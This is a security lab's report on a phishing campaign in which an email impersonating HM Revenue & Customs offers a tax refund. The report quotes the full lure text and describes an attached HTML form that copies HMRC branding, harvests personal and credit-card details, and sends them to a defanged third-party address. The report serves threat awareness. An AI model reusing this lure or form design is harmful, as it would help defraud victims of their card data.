MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “Please Submit Your Payment Refund″ and an attached HTML webpage. We have reported this earlier on on January 27th, 2011, and this campaign is still running in a modified version.
The emails is send from the spoofed email address firstname.lastname@example.org, and possible other combinations, and has the following body:
Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show that you have made over payments of GBP 178.25
Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email.Your refund may take up to 6 weeks to process please make sure you complete the form correctly.
NOTE: If you’ve received an Income Tax ‘repayment’ it will either be following a claim you’ve made or because HM Revenue & Customs (HMRC) has received new information about your taxable income or entitlement to allowances. The refund may come through your tax code or as a payment and could relate to the current tax year or earlier years.
An Income Tax repayment is a refund of tax that you’ve overpaid. So, if you’ve paid too much tax for example through your job or pension this year or in previous years HMRC will send you a repayment. You’ll get the repayment by bank transfer directly to your credit or debit card.
Copyright 2011, HM Revenue Customs UK All rights reserved.
Attached to the email is an HTML page with the name Refund_Form.htm. Once opened you will have a webform to submit your personal details together with your credit card details.
When looking into the HTML source code we can find that the layout and images are directly taken from the http://www.hmrc.gov.uk/ web site. The form data itself will be directed to hxxp://www.hotel-bergara.com/cgi-bin/mailform.cgi. When submitting data you will be redirected to the HM Revenue & Customs web site. The forms hidden values shows us that the data is sent to email@example.com.
We also have a second example where the email contains an URL to the phishing web site instead of an embedded attachment in the message.